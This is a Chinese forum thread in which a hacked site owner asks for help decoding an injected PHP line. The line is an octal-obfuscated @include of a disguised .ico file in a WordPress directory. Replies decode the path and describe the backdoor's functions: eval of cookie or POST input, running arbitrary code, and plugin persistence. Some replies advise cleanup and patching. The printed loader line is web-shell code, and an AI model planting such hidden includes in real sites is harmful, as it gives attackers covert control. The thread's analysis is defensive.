V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
alect
V2EX  ›  问与答

网站被黑,求解密

  •  
  •   alect · 2018-09-02 19:27:54 +08:00 · 2102 次点击
    这是一个创建于 2279 天前的主题,其中的信息可能已经有所发展或是发生改变。
    <?php
    /*2baab*/

    @include "\057ho\155e/\152im\155y/\144om\141in\163/i\156ba\156gb\141ng\056co\155/p\162iv\141te\137ht\155l/\167p-\151nc\154ud\145s/\122eq\165es\164s/\103oo\153ie\057.f\070b8\144b4\141.i\143o";

    /*2baab*/
    6 条回复    2018-09-02 22:45:43 +08:00
    msputup
        1
    msputup  
       2018-09-02 20:06:57 +08:00   ❤️ 2
    @include "/home/jimmy/domains/inbangbang.com/private_html/wp-includes/Requests/Cookie/.f8b8db4a.ico";

    你要看看你的 ico 这个文件,应该是一段 php 代码。
    beastk
        2
    beastk  
       2018-09-02 20:07:14 +08:00 via iPhone
    ascii ?
    alect
        3
    alect  
    OP
       2018-09-02 20:38:33 +08:00
    @msputup 感谢,真的是 php 文件

    https://pastebin.com/17mZ772D
    msputup
        4
    msputup  
       2018-09-02 20:49:28 +08:00
    @alect 这个也加密了。不太懂 php。
    des
        5
    des  
       2018-09-02 22:36:07 +08:00
    @alect
    就是木马而已,知道了也没啥用。
    建议清理了修补一下漏洞。

    PS:
    我还是仔细研究了一下,执行过程是
    通过 eval 执行
    从 $_COOKIE 或者 $_POST 获取参数,遍历每一个键值对反序列化,对比 key
    正确的话取 action,action 有四种,分别是 info、eval (执行任意代码)、添加 plugin 和删除 plugin
    plugin 的代码追加在自身文件中,plugin 里面的代码会在每次请求时执行
    嗯,这就是所有的功能了~ o(* ̄▽ ̄*)o
    zsdroid
        6
    zsdroid  
       2018-09-02 22:45:43 +08:00
    f12 了解下
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   3390 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 22ms · UTC 11:41 · PVG 19:41 · LAX 03:41 · JFK 06:41
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.